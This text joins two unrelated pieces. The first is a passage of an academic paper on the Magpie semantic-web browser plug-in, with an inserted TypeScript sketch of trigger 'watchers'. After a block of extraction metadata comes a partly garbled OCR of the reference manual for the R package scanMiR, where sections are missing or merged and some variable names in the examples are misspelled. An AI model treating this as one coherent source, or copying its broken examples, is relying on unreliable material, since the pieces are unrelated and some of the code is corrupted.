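In a Magpie-like setting, the same pass that wraps an entity could also report it to the semantic log, mirroring the behaviour described above; that reporting step is omitted here.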
4 SEMANTIC SERVICES IN MAGPIE
In the previous section we briefly described how a semantic layer is created, displayed and activated. The main benefits of using Magpie, however, are generated from the ability to deploy semantic services on top of the semantic layer. These services are provided to the user as a physically independent layer over a particular HTML document. Magpie distinguishes between two types of semantic services, each having a specific user interaction model: on-demand and trigger services.

4.1 On-demand semantic services
Once the semantic entities on a web page are annotated, the contextual (right-click) menu of a web browser is overridden by an on-demand services menu whenever the mouse hovers over a recognized entity. The 'on-demand services' menu is also context-dependent, as could be expected; however, in this case, it is a semantic context defined by the membership of a particular entity in a particular ontological class. The information on class membership is contained in the ontology or a lexicon generated from the ontology. One specific ontology on our ontology server formally defines what services can be attached to particular classes, and the semantics of their operations. The semantic services are defined and published in line with standards of the emerging web services technology [15]. In our scenario of Magpie serving as a semantic portal for organizational research, the services were defined for the individual ontological classes on the ontology server without any brokering. An example of a service for the class Project is shown as a semantic menu displayed in the center of Fig. 1. Similarly to the parsing and annotation done by the plug-in automatically, the 'on-demand services' menu is also generated on the fly.

Selecting an option in the semantic services menu generates a request to the Magpie dispatcher to contact the appropriate service provider and perform the requested reasoning. The knowledge-level reasoning facilitated by the service provider provides context for a particular entity. This is delivered back to the web browser to be annotated and displayed. An example of a response is visible as a new browser window in the foreground of Fig. 2.

Hence, the Magpie plug-in, in co-operation with the standard browser functionality, facilitates two complementary methods of web browsing. The first is syntactic browsing using the <A HREF=...> anchors inserted into a document by its author. The second browsing method uses the customized semantic anchors created during the automatic annotation, and the dynamically generated semantic services. The former method accesses physically linked content, whereas the latter method makes available the semantic context. Our interface differentiates the two methods to minimize confusion, and to emphasize the complementary nature of the two access mechanisms.

4.2 Trigger semantic services
User-requested (on-demand) semantic services are one method for interacting with the relevant background knowledge. A different type of service gaining popularity are the various agents-recommenders or advisers. These are active or push services, and they differ from the on-demand ones by their tendency to "look over the user's shoulder", gather facts, and present conclusions. In other words, they tend to be data-driven. In our case, a pre-condition for having active services is to keep history logs of browsing, particularly a log of the recognized entities. The label 'browsing history' is appropriate because a log accumulates findings not only from the current web page, but also from previously visited pages in the same browsing session.

While an annotated web page is displayed in a browser, the recognized entities are asserted as facts into the Magpie semantic log KB. Several watchers monitor the patterns in the asserted facts. When the relevant assertions have been made for a particular watcher, a semantic service response is triggered, and applicable knowledge is delivered to the Magpie plug-in, which in turn displays it in a dedicated window next to the user's web browser. In principle, this interaction is asynchronous – the service provider starts the communication, contacts the user's dispatcher, and pushes potentially relevant information to the user. The information that can be pushed in this way may range from simple collections of relevant items to sophisticated guidance on browsing or browsing history visualization. Since the service provider (watcher) taps into a knowledge base constructed potentially from the logs of community members, the guidance or history visualization may draw on community knowledge and behaviors.

This type of setup may seem surprising in the scenario presented earlier, because a journalist is clearly not a member of the KMi community. Does it make sense to send her community-relevant information? We believe that this approach corresponds to a journalist adopting the viewpoint of a specific community to interpret and make sense of a given web resource from the perspective of that community. Thus, formal membership of a particular community and the utilization of its ontological viewpoints are two different roles that can be distinguished when using Magpie. Since a trigger service can be (in principle) subscribed to, it is useful to tap into the knowledge of a community of which the user is not a formal member. On the contrary, this enables him or her to see the document in its 'native' context.
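The watchers are described in the paper only at the knowledge level. As a rough sketch of the data-driven behaviour just outlined (entities asserted into a log, watchers re-evaluated on every assertion), the TypeScript fragment below models a collector-style trigger service; all type and field names are invented for the illustration and are not part of Magpie.

```typescript
// Illustrative sketch: a "watcher" fires once the semantic log contains entities
// matching a simple pattern (here: at least three Person entities seen so far).
interface LogEntry {
  instanceUri: string;
  ontologyClass: string;
  sourceUrl: string;   // page on which the entity was recognized
  seenAt: Date;
}

interface Watcher {
  description: string;
  matches(log: LogEntry[]): boolean;
  onTrigger(log: LogEntry[]): void; // e.g. push items into a collector window
}

class SemanticLog {
  private entries: LogEntry[] = [];
  constructor(private watchers: Watcher[]) {}

  assert(entry: LogEntry): void {
    this.entries.push(entry);
    // Re-evaluate every watcher after each assertion (data-driven behaviour).
    for (const w of this.watchers) {
      if (w.matches(this.entries)) {
        w.onTrigger(this.entries);
      }
    }
  }
}

// Example watcher: collect projects once three or more people have been seen.
const projectCollector: Watcher = {
  description: "Show projects related to people found so far",
  matches: (log) => log.filter((e) => e.ontologyClass === "Person").length >= 3,
  onTrigger: (log) =>
    console.log(
      "trigger: query ontology for projects of",
      log.filter((e) => e.ontologyClass === "Person").map((e) => e.instanceUri)
    ),
};

const semanticLog = new SemanticLog([projectCollector]);
```

A real implementation would query the ontology server asynchronously inside onTrigger rather than logging to the console; the point of the sketch is only the assert-then-re-evaluate loop.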
4.3 Semantic 'bookmarking'
The opportunity to adopt a particular viewpoint for interpreting web pages from the perspective of a given community has other benefits. One of them is the possibility to offer a dedicated tool for managing browsing history – using a particular viewpoint. Going back to the study of Tauscher and Greenberg [16] mentioned in the introduction, as many as 58% of web page downloads are re-visits. One design recommendation from their study is that bookmarks should have a meaningful representation. History management based on the semantics of the visited pages, and implemented by a **triggered** semantic layer, may help to alleviate issues with the syntactic and linear (access-time ordered) methods. Instead of searching browsing history records in an unnatural (for humans) space of URLs and access dates, we give users the opportunity to search a conceptual space containing entities with specific semantic meanings. Instead of plain URLs, our semantic logging works with URLs that are annotated and associated with concepts such as 'Projects' or 'Research Areas'.

A snapshot of the Magpie "Where am I?" interface is shown in Fig. 3. It consists of an iconic bar (A) displaying visited pages graphically, a list of neighbouring pages (B), the ontological footprint of a particular page (C), and a semantic filter interface (D). The visited pages can be either browsed in a standard linear fashion, or filtered and searched using concepts from a particular ontology. This is the same ontology that was originally used to annotate the pages. An ontological footprint can be defined as a set of annotations that were automatically extracted from a particular web page. A footprint is thus a summary of a particular page from the perspective of a given ontology. The combination of seeing a web page in its 'syntactic' neighbourhood superimposed by the ontological footprint is the primary novelty introduced by our Magpie framework.

Semantic filters (see pointer D in Fig. 3) can be used to reduce the number of visible web pages from the user's browsing history. An example of such a conceptual query trying to find a particular subset of web pages is shown in Fig. 4. The underlying ontology supports inference over a user-formulated query. For example, in our case, no member of KMi is working directly in the area of visualization but in related areas (such as software debugging and telepresence). Similarly, the research interests are associated with 'research staff', which is recognized as a sub-class of 'academic'.

(and
  (academic ?X)
  (has-research-interest ?X visualization))

Fig. 4. An example of a semantic filter using concepts from the ontology, which finds and shows only the web pages containing academics who work on visualization (see results in Fig. 5).

5 OVERVIEW OF SIMILAR WORK
One of the inspirations for Magpie was the COHSE system [2]. COHSE combines an Open Hypermedia System with an ontology server into a framework for ontological linking – an ontology-derived lexicon is used to add links to arbitrary web pages. The links are added either by a proxy server or by an augmented Mozilla browser. The distinctions between Magpie and COHSE are in their differing design goals. The goals for COHSE were (i) to separate web links and web pages, and (ii) to make these links conceptual (i.e. ontology-based). The goal for Magpie is to support interpretation and information gathering. Magpie's interface enables entities to be recognized and annotated on the client side. Instead of embedding new relevant links into a document, Magpie offers class-dependent semantic services for each entity found. Magpie also offers **trigger** services via semantic logs.
Neither type of Magpie service replaces traditional links; they are an auxiliary and extendible knowledge source available at the user’s fingertips. A number of tools support annotation of web pages. A classic example is the Amaya HTML editor that implements the Annotea infrastructure [8]. Annotea users may add various meta-statements to a document, which are separate from the document itself and are accessible to collaborating teams via a central annotation server. The annotation in this sense attaches additional information to a web page. This makes Annotea a powerful tool for joint authoring with a small group of collaborating agents sharing a common goal. However, this approach makes it difficult to facilitate annotation sharing in ‘open’ user communities. In these cases, there is no guarantee that a freely articulated annotation would convey the same meaning to the different users. Unlike Magpie, Annotea assumes that someone (author?) invests additional effort into making a page semantically rich. Magpie is more liberal and assumes a reader only subscribes to a domain ontology, which is then used to channel background knowledge. It may be argued that ontology creation takes more effort than manual document mark-up. This is true; however, ontology as a domain model can be re-used for different purposes, not only the annotation of one document. The effort spent on designing a shared ontology is greater in the short term but in the longer term, it is a more cost-effective way of recording a shared point of view. Moreover, ontologies are increasingly available for download, so often, no development is actually required. The CREAM-based Ont-O-Mat/Annotizer [7] is another tool integrating ontologies and information extraction tools. Annotations in this framework are close to those advocated in this paper. Any ontological instance, attribute or relation may be an annotation hook. A key feature of this tool is its use of discourse representations to structure the relatively flat output of information extraction tools according to the chosen ontology. CREAM’s annotation inferences resemble our trigger services produced by a data-driven reasoning. On the other hand, our ‘on-demand’ services seamlessly address the awareness of the existing relationships and the actual context of ontological instances. Sticky Notes [9] is a tool moving from the annotated web pages to using the annotations for finding items of interest. Their model focuses on the manual annotation, a kind of ‘notes on the margin’ of a particular web page. Being user-driven, a sticky note can reflect the user’s intention or internal conceptualization (e.g. ‘**this idea shall improve turnover**’ in addition to the explicit meta-data (e.g. ‘authored-by’)). The authors propose a high-level language for querying such annotations. Magpie creates conceptual annotations of web pages automatically. Therefore, it cannot express users’ intentions. However, the concepts used in annotation are sufficiently high-level to allow users to query their browsing history in these conceptual terms. While the ‘Sticky Notes’ approach helps with managing personal experiences, it does not lend itself to an automated support for sense-making. Our Magpie assists with finding the web pages, as well as their contextual interpretation. Another strand of research relevant to Magpie framework involves Letizia [11], and the idea of a reconnaissance agent. Such an agent “looks out for the information relevant to the user”. 
In terms of web browsing, pre-filtering the links from a web page may improve the relevance and usefulness of browsing. Functionality similar to that of Letizia ("local reconnaissance") is implemented in Magpie by semantic logging and ontological reasoning with the semantic log. Unlike Letizia, Magpie does not offer any recommendation. Furthermore, Magpie uses an available (and shared) ontological lexicon for NER and annotation rather than specific examples provided to an agent to generalize and learn patterns [10]. Our framework is focused on using the neighbourhood information for filtering and making sense of web pages visited in the past. History access and awareness is important because it enables users to trace particular concepts back to the pages where they were first encountered. Concept tracing throughout a browsing session was piloted in e-commerce applications such as the ZStep-based Woodstein tool [12] that used a (browsing) history to debug user-computer interaction during an e-commerce session. Another stream of research using high-level conceptual annotations of web pages to reason about them comprises the vision of a pervasive 'Memex' environment [3] for recording both an individual's as well as a community's browsing experience.

(Footnote 2: As before, by 'syntactic' we mean pages linked through <A HREF=.../> anchors as defined by the web page author.)

Another similarity between the concepts of reconnaissance agents and user interaction debuggers is the idea of "zero input" or "one-click" interaction. Similarly to Letizia and Woodstein, our Magpie uses the information already present in the web page without asking the user to provide any queries or search keywords. Our approach performs the annotation on the client's browser and provides a host of relevant services 'one click away' from the annotated web page. The services might be distributed around the Web. The only time when we break this rule in Magpie is our browsing history manager. In that case, it may be useful to allow the user to formulate a simple query in a high-level conceptual language rather than logic (as most search engines do).

6 CONCLUSIONS
Reducing the information overload from the expanding web is often cited as the premise for work on supporting the retrieval of relevant documents. But finding relevant documents is only half of the story. Their interpretation involves a reader in understanding the context in which the document was created. To gain the full insight, a reader requires knowledge of the specific terms mentioned and the implicit relationships contained both within the document and between the document and external knowledge sources. Magpie addresses this issue by capturing context within an ontology, which is then used to enrich web documents with a semantic layer. Semantic services expose relevant segments of the ontology according to the user's needs. The choice of ontological viewpoint for interpreting a particular web page drives the interpretation bottom-up – by the user rather than the domain expert or knowledge engineer. Magpie users browse the web in a standard way with negligible differences in their user experience. Magpie achieves this by extending standard web browsers with standard mark-up languages, without altering the layout of the web page or imposing any significant time overhead. The key principle is that the user controls to what extent semantic browsing comes to the fore.
The Magpie toolbar enables concept highlighting according to their ontological class, and the Magpie infrastructure enables arbitrary semantic actions to be triggered by patterns of items found within a semantic log. Trigger services also allow certain tasks to be delegated. In the scenario we showed how discovered entities could be used for later inspection. However, Magpie allows more complex trigger services to be implemented. One example of such a complex service has been described in this paper as a tool for the semantic management of browsing history. This tool draws on the enriched semantic annotation of the web pages within a user's browsing history. In addition to the access times and URLs it offers an ontological footprint, which was created by automatic annotation at the time the user browsed the page. The combination of semantic footprints with web pages automatically annotated using the concepts constituting the footprints facilitates a conceptual search of previously visited pages.

We believe that the abilities to find the right page and make sense of it easily are two fundamental activities contributing to the wider adoption of Semantic Web technologies. Attention, as opposed to information, is now widely acknowledged to be the scarce resource in the Internet age. Consequently, tools that can leverage semantic resources to take some of the burden of the interpretation task from the human reader are going to be of enormous use. We believe that Magpie is a step towards achieving this goal.

Fig. 5. "Where am I?" – a semantic filter (see also Fig. 4) applied on the user's browsing history reduces the number of records shown.

Our current effort is focused on deploying the Magpie tools in the climateprediction.net project. Using the scheme that was successfully deployed in the SETI@home project, climateprediction.net exploits the idle time on PCs to run multiple versions of the UK Met Office climate model. Running large numbers of perturbed climate models (the project aims to collect 2M users) will overcome uncertainties present in the modeling (and hence prediction) process. During their participation in the project, the users would run climate models on their computers for several months. Magpie will be used for the purposes of interacting with and making sense of highly complex analyses of climate data that will be produced from running a statistical ensemble of perturbed climate models. Magpie will also enable lay members of the public to explore the rich scientific resources that exist in the domain of climatology and climate prediction. Thus, it is hoped that the semantic browsing capabilities of Magpie will serve as an enabling technology for the increased public understanding of science.

7 ACKNOWLEDGMENTS
The Magpie research is supported by the Advanced Knowledge Technologies (AKT) and climateprediction.net projects. AKT is an Interdisciplinary Research Collaboration (IRC) sponsored by the UK Engineering and Physical Sciences Research Council under grant no. GR/N15764/01. The AKT IRC comprises the Universities of Aberdeen, Edinburgh, Sheffield, Southampton and The Open University. Climateprediction.net is sponsored by the UK Natural Environment Research Council and UK Department of Trade e-Science Initiative, and involves Oxford University, CLRC Rutherford Appleton Labs and The Open University.

8 REFERENCES
{"Source-Url": "http://oro.open.ac.uk/2972/1/domingue-dzbor-motta-iui2004.pdf", "len_cl100k_base": 6097, "olmocr-version": "0.1.48", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 23020, "total-output-tokens": 7461, "length": "2e12", "weborganizer": {"__label__adult": 0.00035500526428222656, "__label__art_design": 0.0015363693237304688, "__label__crime_law": 0.0004792213439941406, "__label__education_jobs": 0.003086090087890625, "__label__entertainment": 0.0003616809844970703, "__label__fashion_beauty": 0.0002532005310058594, "__label__finance_business": 0.0005998611450195312, "__label__food_dining": 0.0003910064697265625, "__label__games": 0.0008449554443359375, "__label__hardware": 0.0011348724365234375, "__label__health": 0.0007834434509277344, "__label__history": 0.0008192062377929688, "__label__home_hobbies": 0.00015223026275634766, "__label__industrial": 0.0004601478576660156, "__label__literature": 0.0015392303466796875, "__label__politics": 0.0004515647888183594, "__label__religion": 0.000743865966796875, "__label__science_tech": 0.365966796875, "__label__social_life": 0.00033593177795410156, "__label__software": 0.190673828125, "__label__software_dev": 0.427978515625, "__label__sports_fitness": 0.00023281574249267575, "__label__transportation": 0.0005998611450195312, "__label__travel": 0.0003294944763183594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 34198, 0.01896]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 34198, 0.56789]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 34198, 0.90478]], "google_gemma-3-12b-it_contains_pii": [[0, 763, false], [763, 5253, null], [5253, 8706, null], [8706, 14643, null], [14643, 18102, null], [18102, 25256, null], [25256, 29943, null], [29943, 34198, null]], "google_gemma-3-12b-it_is_public_document": [[0, 763, true], [763, 5253, null], [5253, 8706, null], [8706, 14643, null], [14643, 18102, null], [18102, 25256, null], [25256, 29943, null], [29943, 34198, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 34198, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 34198, null]], "pdf_page_numbers": [[0, 763, 1], [763, 5253, 2], [5253, 8706, 3], [8706, 14643, 4], [14643, 18102, 5], [18102, 25256, 6], [25256, 29943, 7], [29943, 34198, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 34198, 0.02206]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
6d60c19f795712e4badb65f58dab1ab299166b35
Package ‘scanMiR’ May 28, 2024 Type Package Title scanMiR Version 1.10.0 Depends R (>= 4.0) Date 2024-04-24 Imports Biostrings, pwalign, GenomicRanges, IRanges, data.table, BiocParallel, methods, GenomeInfoDb, S4Vectors, ggplot2, stats, stringi, utils, graphics, grid, seqLogo, cowplot Suggests knitr, rmarkdown, BiocStyle, testthat (>= 3.0.0) Description A set of tools for working with miRNA affinity models (KdModels), efficiently scanning for miRNA binding sites, and predicting target repression. It supports scanning using miRNA seeds, full miRNA sequences (enabling 3' alignment) and KdModels, and includes the prediction of slicing and TDMD sites. Finally, it includes utility and plotting functions (e.g. for the visual representation of miRNA-target alignment). License GPL-3 VignetteBuilder knitr RoxygenNote 7.3.1 biocViews miRNA, SequenceMatching, Alignment Config/testthat/edition 3 git_url https://git.bioconductor.org/packages/scanMiR git_branch RELEASE_3_19 git_last_commit e3e2d6f git_last_commit_date 2024-04-30 Repository Bioconductor 3.19 Date/Publication 2024-05-27 Author Pierre-Luc Germain [cre, aut] (<https://orcid.org/0000-0003-3418-4218>), Michael Soutschek [aut], Fridolin Gross [aut] Maintainer Pierre-Luc Germain <pierre-luc.germain@hest.ethz.ch> aggregateMatches Description Aggregates miRNA binding sites with log_kd values to predict transcript repression. See the vignette for more detail. Usage ```r aggregateMatches( m, a = 0.007726, b = 0.5735, c = 0.181, p3 = 0.051, coef_utr = 0, coef_orf = 0, p3.range = c(3L, 8L), keepSiteInfo = TRUE, toInt = FALSE, BP = NULL ) ``` **assignKdType** **Arguments** - **m**: A GRanges or data.frame of matches as returned by ‘findSeedMatches’. - **a**: The relative concentration of unbound AGO-miRNA complexes. - **b**: Factor specifying the additional repression by a single bound AGO. - **c**: Penalty for sites that are found within the ORF region. - **p3**: Factor specifying additional repression due to 3p alignment. - **coef_utr**: Factor specifying additional repression due to UTR length. - **coef_orf**: Factor specifying additional repression due to ORF length. - **p3.range**: Range used for 3p alignment. - **keepSiteInfo**: Logical; whether to return information about site types (default = TRUE). Ignored if ’m’ does not contain ‘log_kd’ values. - **toInt**: Logical; whether to convert repression scores to integers (default = FALSE). - **BP**: Pass ‘BiocParallel::MulticoreParam(ncores, progressbar=TRUE)’ to enable multithreading. Note that in addition, ‘aggregateMatches’ uses the data.table package, which is often set to use multi-threading by default (which would be multiplied by threads determined by ’BP’). See setDTthreads for more information. **Value** A data.frame containing aggregated repression values and/or information about the numbers and types of matches. **Examples** ```r # we create mock RNA sequences and seeds: seqs <- getRandomSeq(n=10) # load sample KdModel data(SampleKdModel) # find matches matches <- findSeedMatches(seqs, SampleKdModel) # aggregate matches aggregateMatches(matches) ``` **Description** Assigns a log_kd and match type to a set of matched sequences. **Usage** ```r assignKdType(x, mod, mer8 = NULL) ``` conservation Arguments x A vector of matched sequences, each of 12 nucleotides mod An object of class ‘KdModel’ mer8 The optional set of 8mers included in the model (for internal use; can be reconstructed from the model). 
Value A data.frame with one row for each element of ‘x’, and the columns ‘type’ and ‘log_kd’. To save space, the reported log_kd is multiplied by 1000, rounded and saved as an integer. Examples data(SampleKdModel) assignKdType(c("CTAGCATTAAGT","ACGTACGTACGT"), SampleKdModel) --- conservation Description conservation Usage conservation(x) Arguments x A KdModelList, or a KdModel Value A vector of the conservation status for each miRNA Examples data(SampleKdModel) conservation(SampleKdModel) dummyKdData Create dummy log_kd per 12-mer data **Description** Create dummy log_kd per 12-mer data **Usage** dummyKdData(mod = NULL) **Arguments** - **mod** Optional model from which to create the dummy data **Value** A data.frame with 12-mers and log_kds **Examples** kd <- dummyKdData() findSeedMatches Predicting and characterizing miRNA binding sites **Description** ‘findSeedMatches’ takes a set of sequences and a set of miRNAs (given either as target seeds, mature miRNA sequences, or a KdModelList). **Usage** findSeedMatches( seqs, seeds, shadow = 0L, onlyCanonical = FALSE, maxLogKd = c(-1, -1.5), keepMatchSeq = FALSE, minDist = 7L, p3.extra = FALSE, p3.params = list(maxMirLoop = 7L, maxTargetLoop = 9L, maxLoopDiff = 4L, mismatch = TRUE, GUwob = TRUE), agg.params = .defaultAggParams(), ret = c("GRanges", "data.frame", "aggregated"), Arguments seqs A character vector or 'DNAStringSet' of DNA sequences in which to look. seeds A character vector of 7-nt seeds to look for. If RNA, will be reversed and complemented before matching. If DNA, they are assumed to be the target sequence to look for. Alternatively, a list of objects of class 'KdModel' or an object of class 'KdModelList' can be given. shadow Integer giving the shadow, i.e. the number of nucleotides hidden at the beginning of the sequence (default 0). onlyCanonical Logical; whether to restrict the search only to canonical binding sites. maxLogKd Maximum log_kd value to keep. This has a major impact on the number of sites returned, and hence on the memory requirements. Set to Inf to disable (not recommended when running large scans!). keepMatchSeq Logical; whether to keep the sequence (including flanking dinucleotides) for each seed match (default FALSE). minDist Integer specifying the minimum distance between matches of the same miRNA (default 7). Closer matches will be reduced to the highest-affinity. To disable the removal of overlapping features, use 'minDist=-Inf'. p3.extra Logical; whether to keep extra information about 3' alignment. Disable (default) this when running large scans, otherwise you might hit your system's memory limits. p3.params Named list of parameters for 3' alignment with slots 'maxMirLoop' (integer, default = 7), 'maxTargetLoop' (integer, default = 9), 'maxLoopDiff' (integer, default = 4), 'mismatch' (logical, default = TRUE) and 'GUwob' (logical, default = TRUE). agg.params A named list with slots 'a', 'b', 'c', 'p3', 'coef_utr', 'coef_orf' and 'keepSiteInfo' indicating the parameters for the aggregation. Ignored if 'ret'="aggregated". For further details see documentation of 'aggregateMatches'. ret The type of data to return, either "GRanges" (default), "data.frame", or "aggregated" (aggregates affinities/sites for each seed-transcript pair). BP Pass 'BiocParallel::MulticoreParam(ncores, progressbar=TRUE)' to enable multithreading. verbose Logical; whether to print additional progress messages (default on if not multithreading) n_seeds Integer; the number of seeds that are processed in parallel to avoid memory issues. 
get3pAlignment useTmpFiles Logical; whether to write results for single miRNAs in temporary files (ignored when scanning for a single seed). Alternatively, ‘useTmpFiles’ can be a character vector of length 1 indicating the path to the directory in which to write temporary files. keepTmpFiles Logical; whether to keep the temporary files at the end of the process; ignored if ‘useTmpFiles=FALSE’. Temporary files are removed only upon successful completion of the function, meaning that they will not be deleted in case of errors. Value A GRanges of all matches. If ‘seeds’ is a ‘KdModel’ or ‘KdModelList’, the ‘log_kd’ column will report the ln(Kd) multiplied by 1000, rounded and saved as an integer. If ‘ret!="GRanges", returns a data.frame. Examples # we create mock RNA sequences and seeds: segs <- getRandomSeq(n=10) seeds <- c("AAACCAC", "AAACCUU") findSeedMatches(segs, seeds) get3pAlignment Finds 3' complementary binding of a miRNA Description Performs a local alignment of the miRNA 3' sequence (determined by 'mir3p.start') on given the given sequences. Usage get3pAlignment( segs, mirseq, mir3p.start = 9L, allow.mismatch = TRUE, maxMirLoop = 7L, maxTargetLoop = 9L, maxLoopDiff = 4L, TGsub = TRUE, siteType = NULL ) get8merRange Arguments seqs A set of sequences in which to look for 3’ matches (i.e. upstream of the seed match) mirseq The sequence of the mature miRNA mir3p.start The position in ‘mirseq’ in which to start looking allow.mismatch Logical; whether to allow mismatches maxMirLoop Maximum miRNA loop size maxTargetLoop Maximum target loop size maxLoopDiff Maximum size difference between miRNA and target loops TGsub Logical; whether to allow T/G substitutions. siteType The optional type of seed-complementarity, as returned by `getMatchTypes`. This is needed to identify slicing/TDMD sites. If given, should be a vector of the same length as ‘seqs’. Value A data.frame with one row for each element of ‘seqs’, indicating the size of the miRNA bulge, the size of the target mRNA bulge, the number of mismatches at the 3’ end, and the partial 3’ alignment score (i.e. roughly the number of consecutive matching nucleotides) Examples get3pAlignment(seqs="NNAGTGTGCCATNN", mirseq="TGGAGTGTGACAATGGTGTTTG") data("SampleKdModel") get8merRange(SampleKdModel) Description Returns the minimum and maximum 8-mer log-kd values Usage get8merRange(mod) Arguments mod A ‘KdModel’ Value A numeric vector of length two Examples data("SampleKdModel") get8merRange(SampleKdModel) **getKdModel** --- **Description** getKdModel **Usage** getKdModel(kd, mirseq = NULL, name = NULL, conservation = NA_integer_, ...) **Arguments** kd A data.frame containing the log_kd per 12-mer sequence, or the path to a text/csv file containing such a table. Should contain the columns 'log_kd', '12mer' (or 'X12mer'), and eventually 'mirseq' (if the 'mirseq' argument is NULL) and 'mir' (if the 'name' argument is NULL). mirseq The miRNA (cDNA) sequence. name The name of the miRNA. conservation The conservation level of the miRNA. See `scanMiR:::.conservation_levels()` for possible values. ... Any additional information to be saved with the model. **Value** An object of class 'KdModel'. 
**Examples**
kd <- dummyKdData()
mod <- getKdModel(kd=kd, mirseq="TTAATGCTAATCGTGATAGGGT", name="my-miRNA")

---

**getKmers**

**Description** Returns all combinations of ‘n’ elements of ‘from’

**Usage** `getKmers(n = 4, from = c("A", "C", "G", "T"))`

**Arguments**
- `n`: Number of elements
- `from`: Letters sampled

**Value** A character vector

**Examples** `getKmers(3)`

---

**getMatchTypes**

**Description** Given a seed and a set of sequences matching it, returns the type of match.

**Usage** `getMatchTypes(x, seed, checkWobble = TRUE)`

**Arguments**
- `x`: A character vector of short sequences.
- `seed`: A 7 or 8 nucleotides string indicating the seed (5' to 3' sequence of the target RNA). If of length 7, an "A" will be appended.
- `checkWobble`: Whether to flag wobbled sites

**Value** A factor of match types.

**Examples**
x <- c("AACACTCCAG", "GACACTCCGC", "GTACTCCAT", "ACGTACGTAC")
getMatchTypes(x, seed="ACACTCCA")

---

**getRandomSeq**

**Description** Produces a random sequence of the given letters

**Usage**

```r
getRandomSeq(length = 3000, alphabet = c("A", "C", "G", "T"), n = 1)
```

**Arguments**
- `length`: Length of the sequence
- `alphabet`: Letters from which to sample
- `n`: The number of sequences to generate

**Value** A character vector of length 1

**Examples**

```r
getRandomSeq(100)
```

---

**getSeed8mers**

**Description** Generates all possible 8mers with 4 consecutive and positioned matches to a given seed.

**Usage**

```r
getSeed8mers(seed, addNs = FALSE)
```

**Arguments**
- `seed`: The miRNA seed (target DNA sequence), a character vector of length 8 (if of length 7, an "A" will be added on the right)
- `addNs`: Logical; whether to include 8mers with one flanking N

**Value** A vector of 1024 8mers.
‘what=’logo’" plots a ‘seqLogo’ (requires the [seqLogo]https://bioconductor.org/packages/release/bioc/html/seqLogo.html package) showing the nucleotide-wise information content and preferences for all 12-mers (centered around the seed, oriented in the direction of the target mRNA). ‘what=’both’" plots both. Note that if the package ‘ggseqlogo’ is installed, this will be used instead to plot the logo, resulting in more detailed plot annotation. Value If ‘what=’logo’", returns nothing and plots a position weight matrix. Otherwise returns a ggplot. Examples ```r data(SampleKdModel) plotKdModel(SampleKdModel, what="seeds") ``` Description Removes elements from a GRanges that overlap (or are within a given distance of) other elements higher up in the list (i.e. assumes that the ranges are sorted in order of priority). The function handles overlaps between more than two ranges by successively removing those that overlap higher-priority ones. Usage ```r removeOverlappingRanges( x, minDist = 7L, retIndices = FALSE, ignore.strand = FALSE ) ``` Arguments - `x` A GRanges, sorted by (decreasing) importance. - `minDist` Minimum distance between ranges. - `retIndices` Logical; whether to return the indices of entries to remove, rather than the filtered GRanges. - `ignore.strand` Logical. Whether the strand of the input ranges should be ignored or not. Value A filtered GRanges, or an integer vector of indices to be removed if `retIndices==TRUE`. Examples ```r library(GenomicRanges) gr <- GRanges(seqnames=rep("A",4), IRanges(start=c(10,25,45,35), width=6)) removeOverlappingRanges(gr, minDist=7) ``` SampleKdModel Example KdModel (hsa-miR-155-5p) Description Value a ‘KdModel’ object Examples data(SampleKdModel) SampleKdModel SampleTranscript Example transcript sequence Description An artificial transcript sequence used for examples. Value a named character vector of length 1. viewTargetAlignment viewTargetAlignment Description viewTargetAlignment Usage viewTargetAlignment( m, miRNA, seqs = NULL, flagBulgeMatches = FALSE, p3.params = list(), min3pMatch = 3L, hideSingletons = FALSE, UGsub = TRUE, ..., outputType = c("print", "data.frame", "plot", "ggplot") ) Arguments m A GRanges of length 1 giving the information for a given match, as produced by findSeedMatches. miRNA A miRNA sequence, or a KdModel object of the miRNA corresponding to the match in 'm'; alternatively, a KdModelList including the model. seqs The sequences corresponding to the seqnames of 'm'. Not needed if 'm' contains the target sequences. flagBulgeMatches Logical; whether to flag matches inside the bulge (default FALSE) p3.params See findSeedMatches. min3pMatch The minimum 3' alignment for any to be plotted hideSingletons Logical; whether to hide isolated single base-pair matches UGsub Logical; whether to show U-G matches ... Passed to 'text' if 'outputType="plot"'. outputType Either 'print' (default, prints to console), 'data.frame', or 'plot'. Value Returns nothing 'outputType="print"'. If 'outputType="data.frame"', returns a data.frame containing the alignment strings; if 'outputType="ggplot"' returns a 'ggplot' object. 
Examples
data(SampleKdModel)
seq <- c(seq1="CGACCCCTATCACGTCCGCAGCATTAAAT")
m <- findSeedMatches(seq, SampleKdModel, verbose=FALSE)
viewTargetAlignment(m, miRNA=SampleKdModel, seqs=seq)

Index
[,KdModelList,ANY-method (KdModelList-methods)
aggregateMatches
assignKdType
KdModel
KdModel-class (KdModel)
KdModel-methods (KdModel)
KdModelList
KdModelList (KdModelList-class)
KdModelList-class
KdModelList-methods
plotKdModel
removeOverlappingRanges
SampleKdModel
SampleTranscript
setDTthreads
